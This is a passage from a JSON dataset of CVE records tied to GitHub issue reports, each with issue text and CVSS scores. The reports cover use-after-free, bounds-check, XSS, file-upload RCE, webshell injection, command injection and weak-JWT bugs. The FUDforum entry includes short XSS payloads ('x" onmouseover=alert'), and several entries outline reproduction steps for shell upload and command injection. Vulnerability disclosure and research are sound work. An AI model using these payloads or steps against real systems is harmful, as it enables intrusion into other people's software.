  64215. "description": "Segmentation fault casued by use after free in multithread process from close_stream_in, stream NUMBERTAG to lzma_decompress_buf, stream NUMBERTAG Hi, there. I find there is use after free issue in multithread processing in stream.c. The reason is that the buffer is unchecked during a multithread stream read. APITAG APITAG APITAG APITAG The high level reason might similar with issue NUMBERTAG but the program behavior/path is different. To reproduce, run ~~~~ lrzip t uaf stream NUMBERTAG lrz ~~~~ Since it is a problem in the multithread program, you might need to run this command multiple times to trigger. POC (unzip first): FILETAG Here is the output from the terminal: ~~~~ Decompressing... Bad checksum NUMBERTAG b NUMBERTAG f NUMBERTAG expected NUMBERTAG c Segmentation fault ~~~~ This is the trace reported by ASAN NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG f0e0 at pc NUMBERTAG f8c bp NUMBERTAG ff7bdffdd NUMBERTAG sp NUMBERTAG ff7bdffdd NUMBERTAG Fatal error exiting WRITE of size NUMBERTAG at NUMBERTAG f0e0 thread T NUMBERTAG f8b in lzma_decompress_buf .. APITAG NUMBERTAG f8b in ucompthread .. APITAG NUMBERTAG ff7c1d NUMBERTAG b9 in start_thread ( PATHTAG NUMBERTAG ff7c NUMBERTAG c in clone ( PATHTAG NUMBERTAG f0e0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG ff7c NUMBERTAG a in __interceptor_free ( PATHTAG NUMBERTAG a NUMBERTAG in close_stream_in .. APITAG previously allocated by thread T0 here NUMBERTAG ff7c NUMBERTAG fa in __interceptor_calloc ( PATHTAG NUMBERTAG c8f0 in open_stream_in .. APITAG Thread T3 created by T0 here NUMBERTAG ff7c NUMBERTAG ce1e3 in pthread_create ( PATHTAG NUMBERTAG f3 in create_pthread .. APITAG NUMBERTAG f3 in fill_buffer .. APITAG NUMBERTAG f3 in read_stream .. APITAG SUMMARY: APITAG heap use after free .. APITAG lzma_decompress_buf Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~~",
  64216. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64217. "severity": "MEDIUM",
  64218. "baseScore": 5.5,
  64219. "impactScore": 3.6,
  64220. "exploitabilityScore": 1.8
  64221. },
  64222. {
  64223. "CVE_ID": "CVE-2021-27357",
  64224. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16018",
  64225. "Issue_Url_new": "https://github.com/riot-os/riot/issues/16018",
  64226. "Repo_new": "riot-os/riot",
  64227. "Issue_Created_At": "2021-02-16T09:16:42Z",
  64228. "description": "gnrc_rpl: Lack of bounds check for packed structs. Description RIOT's RPL implementation as provided by the APITAG module lacks proper bounds checks. RPL messages are encapsulated in ICMP NUMBERTAG datagrams. The message body of the ICMP NUMBERTAG datagram is extracted as follows: URLTAG The code above casts APITAG (i.e. the ICMP NUMBERTAG message body) to the appropriate RPL packed struct (e.g. APITAG ). However, it does not check whether the message is large enough to even contain a APITAG (or any other packed RPL struct). As such, the handlers in APITAG for specific RPL messages must check the len parameter before accessing any fields of these structs. The handler for APITAG messages, for example, directly pass the required information to the APITAG function, however, this function itself access fields of the struct before performing a length check to ensure that these fields are actually present. For example: URLTAG If the ICMP packet is too short this will result in an out of bounds read. Steps to reproduce the issue Use APITAG , activate APITAG and set APITAG to your netif (check with ifconfig in the shell provided by APITAG ) mine is APITAG : CODETAG Compile and run the application using: APITAG Afterwards run socat as: APITAG Expected results The application shouldn't crash. Actual results ERRORTAG",
  64229. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64230. "severity": "CRITICAL",
  64231. "baseScore": 9.8,
  64232. "impactScore": 5.9,
  64233. "exploitabilityScore": 3.9
  64234. },
  64235. {
  64236. "CVE_ID": "CVE-2021-27368",
  64237. "Issue_Url_old": "https://github.com/monicahq/monica/issues/4888",
  64238. "Issue_Url_new": "https://github.com/monicahq/monica/issues/4888",
  64239. "Repo_new": "monicahq/monica",
  64240. "Issue_Created_At": "2021-02-18T10:29:23Z",
  64241. "description": "Security Issue XSS. Hi there, I'm using the latest version of Monica PRM web application NUMBERTAG deployed on my local Ubuntu machine. I would like to report to you the existing of Cross Site Scripting Vulnerability in the Contact Page. The following fields of the Contact object can be used to host a stored XSS ( First name, Middle name, Last name, Nickname & Description ) and will be triggered each time you browse the contact webpage or trying to edit the details. This happen because of the way that FILETAG do render the webpage and executing the XSS payload in the vulnerable fields. the payload used in the POC: APITAG FILETAG To mitigate this issue different safeguards can be implemented, please refer to this website for more details: URLTAG Regards,",
  64242. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  64243. "severity": "MEDIUM",
  64244. "baseScore": 5.4,
  64245. "impactScore": 2.7,
  64246. "exploitabilityScore": 2.3
  64247. },
  64248. {
  64249. "CVE_ID": "CVE-2021-27513",
  64250. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/87",
  64251. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/87",
  64252. "Repo_new": "eyesofnetworkcommunity/eonweb",
  64253. "Issue_Created_At": "2021-02-21T07:41:32Z",
  64254. "description": "Arbitrary file upload & RCE. Bonjour, En testant la version NUMBERTAG je me suis rendu compte qu'il \u00e9tait possible d'uploader n'importe quel type de file en bypassant le filtre userside dans le module admin_ITSM, j'ai pu ainsi uploader un shell PHP en le nomant FILETAG via interception et modification de la requ\u00eate. Une demande d'enregistrement MITRE a \u00e9t\u00e9 faite incluant le brut force de session_ID, ce qui donne un RCE non authentifi\u00e9 sur la version NUMBERTAG je sais que vous avez chiffr\u00e9 les sessions_ID en MD5 dans un commit pour la futur version, j'ai bien peur que cela ne serve pas a grand chose, il suffit de chiffrer les sessions_ID \u00e9galement dans le brut force :( ). Je vous encourage \u00e0 inclure des modalit\u00e9s de s\u00e9curit\u00e9s dans le projet github ou une addresse de contact sur le site, parce que devoir mettre ca ici c'est un poil risky mais il n'y a pas vraiment le choix.",
  64255. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  64256. "severity": "HIGH",
  64257. "baseScore": 8.8,
  64258. "impactScore": 5.9,
  64259. "exploitabilityScore": 2.8
  64260. },
  64261. {
  64262. "CVE_ID": "CVE-2021-27519",
  64263. "Issue_Url_old": "https://github.com/fudforum/FUDforum/issues/2",
  64264. "Issue_Url_new": "https://github.com/fudforum/fudforum/issues/2",
  64265. "Repo_new": "fudforum/fudforum",
  64266. "Issue_Created_At": "2021-02-17T07:30:23Z",
  64267. "description": "Cross Site Scripting. What is XSS Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Affected Version NUMBERTAG Demo installation: URLTAG > XSS NUMBERTAG ulnerable parameter srch Vulnerable UR L URLTAG PAYLOAD>&t=search Steps to reproduce the bug NUMBERTAG goto URLTAG NUMBERTAG In \"forum search\" option, paste XSS payload XSS payload: x\" onmouseover=alert NUMBERTAG Hover your mouse to \"x\" and XSS will get triggered Video POC : URLTAG > XSS NUMBERTAG ulnerable parameter author Vulnerable URL URLTAG PAYLOAD> Steps to reproduce the bug NUMBERTAG goto URLTAG NUMBERTAG In the APITAG by User\" search option, paste XSS payload XSS payload: y\" onmouseover=alert NUMBERTAG y NUMBERTAG Hover your mouse to \"y\" and XSS will get triggered Video POC : URLTAG Impact of XSS : If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user. With the help of XSS a hacker or attacker can perform social engineering on users by redirecting them from real website to fake one. hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  64268. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64269. "severity": "MEDIUM",
  64270. "baseScore": 6.1,
  64271. "impactScore": 2.7,
  64272. "exploitabilityScore": 2.8
  64273. },
  64274. {
  64275. "CVE_ID": "CVE-2021-27522",
  64276. "Issue_Url_old": "https://github.com/WaterCountry/Learnsite/issues/1",
  64277. "Issue_Url_new": "https://github.com/watercountry/learnsite/issues/1",
  64278. "Repo_new": "watercountry/learnsite",
  64279. "Issue_Created_At": "2021-02-17T14:26:22Z",
  64280. "description": "there is.",
  64281. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  64282. "severity": "HIGH",
  64283. "baseScore": 8.8,
  64284. "impactScore": 5.9,
  64285. "exploitabilityScore": 2.8
  64286. },
  64287. {
  64288. "CVE_ID": "CVE-2021-27568",
  64289. "Issue_Url_old": "https://github.com/netplex/json-smart-v2/issues/60",
  64290. "Issue_Url_new": "https://github.com/netplex/json-smart-v2/issues/60",
  64291. "Repo_new": "netplex/json-smart-v2",
  64292. "Issue_Created_At": "2021-02-22T21:44:52Z",
  64293. "description": "Uncaught Exception in Parser. The parser fails to throw the ERRORTAG when the parser expects the input to be of the float number type AND the input not being a valid number. This can lead to uncaught exceptions by unexpected input, which may lead to Denial of Service APITAG URLTAG Parser Input of \" .\" or NUMBERTAG e+\" or NUMBERTAG e \" will crash with a ERRORTAG ERRORTAG",
  64294. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64295. "severity": "MEDIUM",
  64296. "baseScore": 5.9,
  64297. "impactScore": 3.6,
  64298. "exploitabilityScore": 2.2
  64299. },
  64300. {
  64301. "CVE_ID": "CVE-2021-27568",
  64302. "Issue_Url_old": "https://github.com/netplex/json-smart-v1/issues/7",
  64303. "Issue_Url_new": "https://github.com/netplex/json-smart-v1/issues/7",
  64304. "Repo_new": "netplex/json-smart-v1",
  64305. "Issue_Created_At": "2021-02-22T21:10:21Z",
  64306. "description": "Uncaught Exception in Parser. The parser fails to throw the ERRORTAG when the parser expects the input to be of the float number type AND the input not being a valid number. This can lead to uncaught exceptions by unexpected input, which may lead to Denial of Service APITAG URLTAG Parser Input of \" .\" or NUMBERTAG e+\" or NUMBERTAG e \" will crash with a ERRORTAG ERRORTAG",
  64307. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64308. "severity": "MEDIUM",
  64309. "baseScore": 5.9,
  64310. "impactScore": 3.6,
  64311. "exploitabilityScore": 2.2
  64312. },
  64313. {
  64314. "CVE_ID": "CVE-2021-27568",
  64315. "Issue_Url_old": "https://github.com/netplex/json-smart-v2/issues/62",
  64316. "Issue_Url_new": "https://github.com/netplex/json-smart-v2/issues/62",
  64317. "Repo_new": "netplex/json-smart-v2",
  64318. "Issue_Created_At": "2021-03-05T03:16:52Z",
  64319. "description": "when we release new version to fix CVETAG . hi, when we release new version to fix CVETAG . Now, the latest version is NUMBERTAG in maven repository. About CVETAG :An issue was discovered in netplex json smart NUMBERTAG through NUMBERTAG and json smart NUMBERTAG through NUMBERTAG An exception is thrown from a function, but it is not caught, as demonstrated by ERRORTAG When it is not caught, it may cause programs using the library to crash or expose sensitive information.",
  64320. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64321. "severity": "MEDIUM",
  64322. "baseScore": 5.9,
  64323. "impactScore": 3.6,
  64324. "exploitabilityScore": 2.2
  64325. },
  64326. {
  64327. "CVE_ID": "CVE-2021-27677",
  64328. "Issue_Url_old": "https://github.com/sruupl/batflat/issues/105",
  64329. "Issue_Url_new": "https://github.com/sruupl/batflat/issues/105",
  64330. "Repo_new": "sruupl/batflat",
  64331. "Issue_Created_At": "2021-02-22T11:07:28Z",
  64332. "description": "Multiple Stored XSS Cross Site Scripting on Batflat CMS NUMBERTAG Multiple Stored XSS Cross Site Scripting on Batflat CMS NUMBERTAG Login with editor account with rights to Navigation, Galleries, Snippets APITAG APITAG ERRORTAG FILETAG Code being executed: FILETAG APITAG APITAG APITAG FILETAG Code being executed: FILETAG APITAG APITAG APITAG FILETAG Code being executed: FILETAG",
  64333. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  64334. "severity": "MEDIUM",
  64335. "baseScore": 5.4,
  64336. "impactScore": 2.7,
  64337. "exploitabilityScore": 2.3
  64338. },
  64339. {
  64340. "CVE_ID": "CVE-2021-27697",
  64341. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16062",
  64342. "Issue_Url_new": "https://github.com/riot-os/riot/issues/16062",
  64343. "Repo_new": "riot-os/riot",
  64344. "Issue_Created_At": "2021-02-22T13:54:17Z",
  64345. "description": "gnrc_rpl: missing bounds checks in gnrc_rpl_validation_options. Description The APITAG function has a problem very similar to the one described in NUMBERTAG It casts packed structs without performing a prior bounds check. For example, consider the handler for APITAG : URLTAG This is missing a check ala.: APITAG Otherwise, reading APITAG (or APITAG on the next iteration) may result in an out of bounds read: URLTAG Steps to reproduce the issue Use APITAG , activate APITAG and set APITAG to your netif (check with ifconfig in the shell provided by APITAG ) mine is APITAG : CODETAG Compile and run the application using: APITAG Afterwards run socat as: APITAG Expected results The application shouldn't crash. Actual results ERRORTAG CC: MENTIONTAG",
  64346. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64347. "severity": "CRITICAL",
  64348. "baseScore": 9.8,
  64349. "impactScore": 5.9,
  64350. "exploitabilityScore": 3.9
  64351. },
  64352. {
  64353. "CVE_ID": "CVE-2021-27698",
  64354. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16085",
  64355. "Issue_Url_new": "https://github.com/riot-os/riot/issues/16085",
  64356. "Repo_new": "riot-os/riot",
  64357. "Issue_Created_At": "2021-02-24T12:39:46Z",
  64358. "description": "gnrc_rpl: missing bounds checks in _parse_options. Description The implementation of APITAG in APITAG has a problem very similar to the one described in NUMBERTAG for APITAG : It casts packed structs without performing prior boundary checks. I think the loop code is in fact more or less a copy of the one in APITAG , thus a fix very similar to NUMBERTAG will be needed for it too. Consider for example the following code: URLTAG In this case it might be the case that APITAG , however this case is not covered by the implementation currently. There are also other casts to packed structs in this function which have the same issue. Steps to reproduce the issue Use APITAG , activate APITAG and set APITAG to your netif (check with ifconfig in the shell provided by APITAG ) mine is APITAG : CODETAG I was also a bit too lazy to figure out how I can add an ULA to a APITAG network interface, to work around that just make sure APITAG uses the first interface for DODAGs with the following patch (if you know how please let me know): CODETAG Note: If you don't want to apply this patch, it should also be possible to reproduce this issue by adding a non local IP NUMBERTAG address to your network interface and passing that address to the rpl root command below. Compile and run the application using: APITAG In the RIOT term initialize the RPL root instance with (the address passed to rpl root doesn't matter due to the patch from above): APITAG Afterwards run socat as: APITAG Expected results The application shouldn't crash. Actual results ERRORTAG CC: MENTIONTAG",
  64359. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64360. "severity": "CRITICAL",
  64361. "baseScore": 9.8,
  64362. "impactScore": 5.9,
  64363. "exploitabilityScore": 3.9
  64364. },
  64365. {
  64366. "CVE_ID": "CVE-2021-27811",
  64367. "Issue_Url_old": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/2",
  64368. "Issue_Url_new": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/2",
  64369. "Repo_new": "whiskey-jj/w2s2x2222.github.io",
  64370. "Issue_Created_At": "2021-02-25T04:15:57Z",
  64371. "description": "A Code Injection vulnerability has been found in Qibosoft NUMBERTAG Last year, I found a Code Injection vulnerability in Qibosoft NUMBERTAG submitted China's cnvd, and obtained the CNVD number( CNVD NUMBERTAG URLTAG . Vulnerability demonstration I used the latest version of software in the test, and deployed the Apache server. The PHP version is NUMBERTAG and APITAG version is NUMBERTAG image NUMBERTAG URLTAG \u200b Log in to the administration page and visit the following URL. APITAG \u200b You can see that a webshell has been written to a PHP APITAG can find it in ERRORTAG image NUMBERTAG URLTAG Code audit APITAG \u200b In this function, the writelog function is called to write the APITAG to the file. image NUMBERTAG URLTAG \u200b In the writelog function, you can see that he finally writes the data to ERRORTAG image NUMBERTAG URLTAG \u200b In order to expand the vulnerability,we can use low privilege users to use XSS or CSRF attacks to make the administrator access the vulnerability APITAG vulnerabilities I have submitted in CNVD NUMBERTAG URLTAG",
  64372. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  64373. "severity": "HIGH",
  64374. "baseScore": 7.2,
  64375. "impactScore": 5.9,
  64376. "exploitabilityScore": 1.2
  64377. },
  64378. {
  64379. "CVE_ID": "CVE-2021-27815",
  64380. "Issue_Url_old": "https://github.com/libexif/exif/issues/4",
  64381. "Issue_Url_new": "https://github.com/libexif/exif/issues/4",
  64382. "Repo_new": "libexif/exif",
  64383. "Issue_Created_At": "2021-02-25T07:19:10Z",
  64384. "description": "APITAG in APITAG Project: exif system: ubuntu NUMBERTAG Fuzzer: afl_exif_out_xml FILETAG Command: APITAG asan ERRORTAG gdb CODETAG",
  64385. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64386. "severity": "MEDIUM",
  64387. "baseScore": 5.5,
  64388. "impactScore": 3.6,
  64389. "exploitabilityScore": 1.8
  64390. },
  64391. {
  64392. "CVE_ID": "CVE-2021-27836",
  64393. "Issue_Url_old": "https://github.com/libxls/libxls/issues/94",
  64394. "Issue_Url_new": "https://github.com/libxls/libxls/issues/94",
  64395. "Repo_new": "libxls/libxls",
  64396. "Issue_Created_At": "2021-02-26T19:58:44Z",
  64397. "description": "libxls APITAG NULL pointer dereference vulnerability. libxls APITAG NULL pointer dereference INTRODUCTION A NULL pointer dereference vulnerability has been detected in the function APITAG when trying to access the rdi register that is NULL at that time. Looking at the code we can realize it is because of trying to access APITAG to that pointer, which is the argument for the function. The argument for APITAG comes from the return value of APITAG : APITAG If we enter the function APITAG : CODETAG We can easily deduce that if either num is less than NUMBERTAG or num is greater than APITAG the conditional won't succeed, thus returning pWS directly without assigning it a heap chunk. As the pointer has been initialized with NULL, a NULL pointer is returned, which will be the argument for the next function, and the program will crash when trying to access it. REPRODUCE To reproduce this crash, the APITAG file has been used with a specially crafted XLS file. The crafted file needs to have no ERRORTAG records to make APITAG be NUMBERTAG ERRORTAG ANALYSIS As I explained in the Introduction section, we need num to be less than NUMBERTAG or greater than APITAG . Having one (or both) of those requirements can trigger the NULL pointer dereference. In APITAG : APITAG The first condition will never fail as i will always be greater or equal to NUMBERTAG Also, i cannot be greater than APITAG as depends on it's value to be incremented. But... what if APITAG is equal to NUMBERTAG Then i will be NUMBERTAG too. In the conditional i won't be less than APITAG , but equal, thus failing the conditional. The function APITAG , responsible for incrementing the APITAG value is never executed with the current APITAG xls file, thus keeping until crash time the value which the program gave it when being initialized at APITAG : APITAG But how do we make the program to not execute APITAG ? We initially need to avoid any ERRORTAG record. If we craft an XLS file that do not contain any ERRORTAG record, this code will never reached: ERRORTAG And APITAG will be NUMBERTAG when reaching the conditional code. The result is a SIGSEGV APITAG fault) interruption crashing the program trying to access non mapped memory: CODETAG IMPACT The most common issue with this type of vulnerability is a Denial of Service APITAG once a crash has been triggered as demonstrated above with the crash APITAG SOLUTION A solution for this issue could be adding a pointer check before using it, and change the actions once a pointer is detected to be NULL. Patch example: ERRORTAG Obviously, the pointer is used multiple times in the code, so having it NULL is something not expected. A more complex patch is needed to avoid unexpected results for the next functions to be executed instead of just returning if a NULL pointer is detected. Anyway, a better solution for this patch is update the conditional at APITAG to this: APITAG This time, if num is equal to APITAG the heap chunk will be returned avoiding a NULL pointer being returned.",
  64398. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64399. "severity": "MEDIUM",
  64400. "baseScore": 6.5,
  64401. "impactScore": 3.6,
  64402. "exploitabilityScore": 2.8
  64403. },
  64404. {
  64405. "CVE_ID": "CVE-2021-27847",
  64406. "Issue_Url_old": "https://github.com/libvips/libvips/issues/1236",
  64407. "Issue_Url_new": "https://github.com/libvips/libvips/issues/1236",
  64408. "Repo_new": "libvips/libvips",
  64409. "Issue_Created_At": "2019-02-20T13:19:56Z",
  64410. "description": "bugs found by our scanner. Hi, we developed a taint analysis based static analysis tool named Vanguard. It could prognosis potential vulnerabilities by identifying security sensitive operations (e.g. divide zero, mod zero, array index access, and sensitive function calls) without proper checks for their operands. Some code locations are listed in the following. We think these locations maybe bugs after our manual analysis. Please check them, and add precondition checks if necessary. APITAG Zero NUMBERTAG in function APITAG , zoom.c L NUMBERTAG L NUMBERTAG L NUMBERTAG URLTAG CODETAG APITAG CODETAG Divisor: zoom >xfac, zoom >yfac Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , point.c L NUMBERTAG URLTAG CODETAG Divisor: range Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , eye.c L NUMBERTAG URLTAG APITAG Divisor: h Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , mask.c L NUMBERTAG URLTAG APITAG Divisor: half_width, half_height Result: Could be NUMBERTAG Please Check. Array Index Bound NUMBERTAG in function APITAG , gamma.c L NUMBERTAG URLTAG APITAG Array expression: vips_gamma_maxval in APITAG needs bound checking NUMBERTAG APITAG APITAG APITAG APITAG needs bound checking NUMBERTAG APITAG APITAG APITAG APITAG needs bound checking NUMBERTAG APITAG APITAG Sensitive Function Call NUMBERTAG in function APITAG ,[ unpack_seek.c L NUMBERTAG URLTAG APITAG memcpy] is a security sensitive function using tainted data: [wphdr NUMBERTAG in function APITAG ,[ tiff2vips.c L NUMBERTAG URLTAG APITAG memcpy] is a security sensitive function using tainted data: [len NUMBERTAG in function APITAG ,[ sinkscreen.c L NUMBERTAG URLTAG APITAG memcpy] is a security sensitive function using tainted data: [len NUMBERTAG in function APITAG ,[ region.c L NUMBERTAG L NUMBERTAG URLTAG APITAG APITAG [memset] is a security sensitive function using tainted data: [wd ] [memcpy] is a security sensitive function using tainted data: [wd ]",
  64411. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64412. "severity": "MEDIUM",
  64413. "baseScore": 6.5,
  64414. "impactScore": 3.6,
  64415. "exploitabilityScore": 2.8
  64416. },
  64417. {
  64418. "CVE_ID": "CVE-2021-27884",
  64419. "Issue_Url_old": "https://github.com/YMFE/yapi/issues/2117",
  64420. "Issue_Url_new": "https://github.com/ymfe/yapi/issues/2117",
  64421. "Repo_new": "ymfe/yapi",
  64422. "Issue_Created_At": "2021-02-23T14:55:07Z",
  64423. "description": "Potential security vulnerability in APITAG APITAG Security Lab (GHSL) Vulnerability Report: APITAG Summary Weak random number generator is used to sign JSON Web Token (JWT). Product APITAG URLTAG Tested Version The latest commit to the date NUMBERTAG e1f NUMBERTAG URLTAG . Details JWT signing Function APITAG URLTAG is using a cryptographically insecure pseudo random number generator APITAG to create a randomly looking string that later is used to sign and verify issued tokens: APITAG When a new user is created the APITAG function is used to generate a passsalt . It is used as a salt to hash the password and as the secret to sign a JWT that authenticates the user: CODETAG The APITAG returns a floating point number that is more than or equal to NUMBERTAG and less than NUMBERTAG The call to APITAG formats the number as base NUMBERTAG For example, APITAG gets encoded as APITAG . The first two characters are trimmed and the result is APITAG . The generated secret is mostly NUMBERTAG characters long and consists of numbers and lowercase Latin alphabet characters only. Since the trimmed part is always APITAG the calculation is completely reversible. The weakness of cryptographically insecure pseudo random number generators is that given some number of observed values the internal state of the generator can be recreated that reveals the numbers generated in the past or allows calculation of the future outputs. The internal state of the current implementation of APITAG in FILETAG (a modification of APITAG algorithm) can be recreated from three observed consecutive values. To get the values an attacker may automate the user creation process to get three new user tokens rapidly, then run a brute force attack on the JWT HMAC signatures. This still should not be feasible to do in a reasonable time on a single machine like: CODETAG However a very rough estimation shows that by using cloud computing the attack could cost from NUMBERTAG to NUMBERTAG to break the tokens APITAG three values versus one value has very little penalty as cracking machines are optimized for multiple hashes and cracking a single hash doesn't fully utilize computer resources). Please notice that the token's NUMBERTAG days expiration time doesn't put a limit on the attack as the target is the passsalt value used to sign the token. Impact After successfully brute forcing the three pseudo random values the attacker may recreate the passsalt values that are used to sign tokens of other users. It may be argued if there is an incentive to spend this amount of resources, but GPUs get better all the time. Remediation Use APITAG to get at least NUMBERTAG bytes random value in APITAG . Consider not using the passsalt for signing JWT, but using a NUMBERTAG bits secret from the server configuration environment. Credit This issue was discovered and reported by GHSL team member MENTIONTAG APITAG Loba\u010devski) URLTAG . Contact You can contact the GHSL team at APITAG , please include a reference to APITAG in any communication regarding this issue. Disclosure Policy This report is subject to our coordinated disclosure policy URLTAG .",
  64424. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  64425. "severity": "MEDIUM",
  64426. "baseScore": 5.1,
  64427. "impactScore": 2.5,
  64428. "exploitabilityScore": 2.5
  64429. },
  64430. {
  64431. "CVE_ID": "CVE-2021-27884",
  64432. "Issue_Url_old": "https://github.com/YMFE/yapi/issues/2263",
  64433. "Issue_Url_new": "https://github.com/ymfe/yapi/issues/2263",
  64434. "Repo_new": "ymfe/yapi",
  64435. "Issue_Created_At": "2021-07-15T11:41:16Z",
  64436. "description": "YAPI NUMBERTAG days\u6f0f\u6d1e\uff0c\u53d1\u73b0\u670d\u52a1\u5668\u4ee3\u7801\u5360\u6ee1\u4e86. \u7248\u672c\u53f7 ~ \u4ec0\u4e48\u95ee\u9898 ~ \u5982\u4f55\u590d\u73b0\u6b64\u95ee\u9898 ~ APITAG \u4ec0\u4e48\u6d4f\u89c8\u5668 ~ APITAG Windows, APITAG",
  64437. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  64438. "severity": "MEDIUM",
  64439. "baseScore": 5.1,
  64440. "impactScore": 2.5,
  64441. "exploitabilityScore": 2.5
  64442. },
  64443. {
  64444. "CVE_ID": "CVE-2021-27886",
  64445. "Issue_Url_old": "https://github.com/rakibtg/docker-web-gui/issues/23",
  64446. "Issue_Url_new": "https://github.com/rakibtg/docker-web-gui/issues/23",
  64447. "Repo_new": "rakibtg/docker-web-gui",
  64448. "Issue_Created_At": "2021-01-31T02:00:31Z",
  64449. "description": "Security: lack of input validation in APIs leads to command injection. For example, making GET requests such as the following results in arbitrary commands being executed on the server, outside of the intended docker process only. This is otherwise known as a remote command injection bug (especially since FILETAG listens on the network interface by default, accessible by anyone on the network, even though the intended access is localhost). > URLTAG ERRORTAG For example executing the id command may return: APITAG Some of the other APIs seem vulnerable to injection as well. Recommended easiest fix would be the following NUMBERTAG allow only alphanumeric characters in the parameters (strings that actually look like container and image names NUMBERTAG have a list of allowed commands such as start/stop, etc. Ensure this simple validation routine validates the user input before concatenating parameters and calling APITAG . Return a \"bad parameter\" error message if the validation doesn't pass. Additional references for hardening the code FILETAG URLTAG",
  64450. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64451. "severity": "CRITICAL",
  64452. "baseScore": 9.8,
  64453. "impactScore": 5.9,
  64454. "exploitabilityScore": 3.9
  64455. },
  64456. {
  64457. "CVE_ID": "CVE-2021-27935",
  64458. "Issue_Url_old": "https://github.com/AdguardTeam/AdGuardHome/issues/2470",
  64459. "Issue_Url_new": "https://github.com/adguardteam/adguardhome/issues/2470",
  64460. "Repo_new": "adguardteam/adguardhome",
  64461. "Issue_Created_At": "2020-12-21T18:37:22Z",
  64462. "description": "Hash of the password stored in the cookies. It [seems]( URLTAG ) that the username as well as the bcrypt'ed password have their sha NUMBERTAG stored in the cookie. This is a bit worrying, since an attacker able to get the cookie would not only gain access to AGH, but also be able to bruteforce offline the password. A possible way to address this would be to use a random string instead of APITAG .",
